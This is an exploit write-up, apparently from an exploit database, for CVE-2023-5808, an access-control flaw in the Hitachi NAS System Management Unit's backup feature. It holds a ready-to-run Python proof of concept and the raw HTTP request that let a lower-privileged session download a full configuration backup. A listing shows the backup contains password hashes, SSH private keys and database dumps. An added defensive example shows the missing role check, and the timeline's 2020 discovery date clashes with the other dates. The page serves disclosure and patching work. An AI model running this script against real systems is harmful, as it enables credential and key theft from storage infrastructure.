## https://sploitus.com/exploit?id=BDF69D81-4397-5816-907B-3B35E6DFF167
## CVE-2023-5808
`CVE-2023-5808` is an *Insecure Direct Object Reference* (**IDOR**) vulnerability 
in the `Backup & Restore` functionality of the Hitachi NAS (`HNAS`) 
*System Management Unit* (`SMU`). It affects `SMU` versions prior to 
`14.8.7825.01`.

## Exploitation
This exploit requires the attacker to have control over the credentials of a 
user account that is not `Read-Only` or `Global Administrator`, i.e.:
- `Storage Administrator`
- `Server Administrator`
- `Server + Storage Administrator`

By design, users with the `Global Administrator` role are able to access 
`SMU`'s `Backup & Restore` functionality, located at `https://<HOSTNAME/FQDN/IP>/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored`, 
and send the following request, which creates and downloads an 
(unencrypted, password-less) backup:

```
GET /mgr/app/template/simple%2CBackupSmuScreen.vm/password/ HTTP/1.1
Host: REDACTED
Cookie: JSESSIONID=REDACTED; JSESSIONIDSSO=REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://REDACTED/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

```

If the request is successful, the `SMU` returns the following response headers 
and starts the download of `smu_2023-04-12_1543+0200.zip`:

```
HTTP/1.1 200 
Cache-Control: PRIVATE
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
P3P: CP="NOI DSP CUR ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: cache
Content-Disposition: attachment;filename=smu_2023-04-12_1543+0200.zip
Content-Type: application/download
Content-Length: 1831412
Date: Wed, 12 Apr 2023 13:43:15 GMT
Connection: close
Server: SMU

[DATA]
```

However, due to an oversight in `SMU`'s business logic, the same request also 
succeeds when the `JSESSIONID` and `JSESSIONIDSSO` cookies belong to a 
`Storage Administrator`, `Server Administrator` or 
`Server + Storage Administrator` session. An attacker holding such an account 
can therefore replace the two cookies with those of that account and download 
the backup archive.

Thus, a script like `CVE-2023-5808.py` could be used to exploit this 
vulnerability:

```python
#!/usr/bin/python3
#
# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability
# CVE:              CVE-2023-5808
# Date:             2023-12-13
# Exploit Author:   Arslan Masood (@arszilla)
# Vendor:           https://www.hitachivantara.com/
# Version:          < 14.8.7825.01
# Tested On:        13.9.7021.04

import argparse
from datetime import datetime
from os import getcwd

import requests
import urllib3

# The SMU typically serves a self-signed certificate; without this, verify=False
# below prints an InsecureRequestWarning on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser(
    description="CVE-2023-5808 PoC",
    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
    )

# Create --host argument:
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
    )

# Create --sso argument:
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
    )


def download_file(hostname, jsessionid, jsessionidsso):
    # Local filename for the downloaded archive:
    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"

    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"

    # GET request cookies (the session of the lower-privileged account):
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # GET request headers:
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # Send the request and stream the archive to disk:
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        # A successful download answers 200 with a Content-Disposition attachment
        # (see the response above); anything else means the session or host is wrong.
        content_disposition = file_download.headers.get("Content-Disposition", "")
        if file_download.status_code != 200 or "attachment" not in content_disposition:
            print(f"Request failed (HTTP {file_download.status_code}); check the host and cookie values")
            return

        with open(filename, "wb") as backup_archive:
            # Write the zip file to the CWD in chunks:
            for chunk in file_download.iter_content(chunk_size=8192):
                backup_archive.write(chunk)

    print(f"{filename} has been downloaded to {getcwd()}")


if __name__ == "__main__":
    args = parser.parse_args()
    download_file(args.host, args.id, args.sso)
```
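The access-control gap the PoC relies on, shown from the defender's side as an added example (not the page's or Hitachi's code): a constructed session store keyed by the `JSESSIONID`/`JSESSIONIDSSO` cookie pair, a download handler that only checks for a valid session (the IDOR), and a hardened handler that also enforces the `Global Administrator` role on the download endpoint itself. The `Role`, `Session` and `SESSIONS` names and the cookie values are hypothetical.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Dict, Optional, Tuple


class Role(Enum):
    """SMU roles named in the write-up (hypothetical enum, not SMU's own code)."""
    READ_ONLY = "Read-Only"
    STORAGE_ADMIN = "Storage Administrator"
    SERVER_ADMIN = "Server Administrator"
    SERVER_STORAGE_ADMIN = "Server + Storage Administrator"
    GLOBAL_ADMIN = "Global Administrator"


@dataclass(frozen=True)
class Session:
    user: str
    role: Role


# Constructed session store keyed by the (JSESSIONID, JSESSIONIDSSO) pair; placeholder values.
SESSIONS: Dict[Tuple[str, str], Session] = {
    ("ADMIN-ID", "ADMIN-SSO"): Session("admin", Role.GLOBAL_ADMIN),
    ("STOR-ID", "STOR-SSO"): Session("storage-op", Role.STORAGE_ADMIN),
}


def _lookup(cookies: Dict[str, str]) -> Optional[Session]:
    """Resolve the cookie pair to a session; both cookies must match together."""
    key = (cookies.get("JSESSIONID", ""), cookies.get("JSESSIONIDSSO", ""))
    return SESSIONS.get(key)


def backup_download_vulnerable(cookies: Dict[str, str]) -> int:
    """Authentication only: any valid session is served the archive (the IDOR)."""
    if _lookup(cookies) is None:
        return 401
    return 200  # the backup .zip would be streamed here


def backup_download_fixed(cookies: Dict[str, str]) -> int:
    """Authentication and authorization: the role is enforced on the
    download endpoint itself, not only on the page that links to it."""
    session = _lookup(cookies)
    if session is None:
        return 401
    if session.role is not Role.GLOBAL_ADMIN:
        return 403  # Storage/Server Administrator sessions are refused
    return 200
```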

The CVSS v3.1 score of 7.6 is easier to justify once the contents of 
`smu_2023-04-12_1543+0200.zip` are examined:

```
$ tree -a
.
├── adc_replic
│   ├── backup.properties
│   ├── mig_policies
│   │   ├── MIGR_TEST_POL
│   │   │   ├── 1
│   │   │   │   ├── config
│   │   │   │   └── lockfile
│   │   │   ├── config
│   │   │   └── lockfile
│   │   └── next_schedule
│   ├── mig_rules
│   │   └── MIGR_TEST
│   ├── pkgHandler.xml
│   ├── replic_policies
│   ├── replic_rules
│   ├── replic_schedules
│   │   └── next_schedule
│   └── replic_scripts
├── backup.properties
├── mgr
│   ├── axalon.properties
│   ├── backup.properties
│   ├── banner.txt.disabled
│   ├── managedservers.json
│   ├── pkgHandler.xml
│   ├── systemmonitor_1.xml
│   ├── systemmonitor_2.xml
│   └── systemmonitor_3.xml
├── network
│   └── yp.conf
├── postgresql
│   ├── backup.properties
│   ├── config_pgdump.tar
│   ├── pkgHandler.xml
│   └── rolledupstats_pgdump.tar
├── quorumdev2
│   ├── backup.properties
│   ├── CB-HNAS1-CLU
│   │   └── cluster.conf
│   ├── HH-HNAS1-CLU
│   │   └── cluster.conf
│   └── quorumdev2.conf
├── quorumdevice
│   └── backup.properties
├── readyToShip
│   ├── backup.properties
│   ├── pkgHandler.xml
│   ├── ssh_host_dsa_key
│   ├── ssh_host_dsa_key.pub
│   ├── ssh_host_key
│   ├── ssh_host_key.pub
│   ├── ssh_host_rsa_key
│   └── ssh_host_rsa_key.pub
├── server-tools
│   ├── backup.properties
│   ├── ldap.conf.rb
│   ├── massage-commands-for-managed-servers
│   ├── ypcat-group
│   └── ypcat-passwd
├── smu_users
│   ├── backup.properties
│   ├── manager
│   │   └── ssh
│   │       └── known_hosts
│   ├── pkgHandler.xml
│   ├── root
│   │   └── ssh
│   │       └── known_hosts
│   └── shadow
└── tomcat
    ├── backup.properties
    ├── nas.keystore
    └── pkgHandler.xml

25 directories, 49 files
```

The `.zip` archive contains various files describing the `SMU`'s configuration, 
including (but not limited to):
- `SMU`'s `/etc/shadow` file, containing every user's `CLI` password hashes,
- `PEM DSA`, `PEM RSA`, and `OpenSSH RSA1` private keys,
- `PostgreSQL` database dump.

## Notes
This vulnerability is a "sister vulnerability" to 
[CVE-2023-6538][CVE-2023-6538].

## References
- [CVE-2023-5808][CVE-2023-5808]
- [CVE-2023-6538][CVE-2023-6538]
- [Hitachi Vantara Security Bulletin for CVE-2023-5808][Hitachi Vantara Security Bulletin]

## Timeline
- 2020-04-12 - Vulnerability discovered
- 2023-04-20 - Vulnerability reported to security.vulnerabilities@hitachivantara.com
- 2023-08-11 - Initial CVE number assignment
- 2023-12-06 - CVE numbers re-assigned
- 2023-12-11 - CVE numbers re-assigned
- 2023-12-11 - CVE published
- 2023-12-13 - Public disclosure

[CVE-2023-5808]:                        https://vulners.com/cve/CVE-2023-5808
[CVE-2023-6538]:                        https://vulners.com/cve/CVE-2023-6538
[Hitachi Vantara Security Bulletin]:    https://knowledge.hitachivantara.com/Security/System_Management_Unit_(SMU)_versions_prior_to_14.8.7825.01%2C_used_to_manage_Hitachi_Vantara_NAS_products_are_susceptible_to_unintended_information_disclosure_via_unprivileged_access_to_HNAS_configuration_backup_and_diagnostic_data.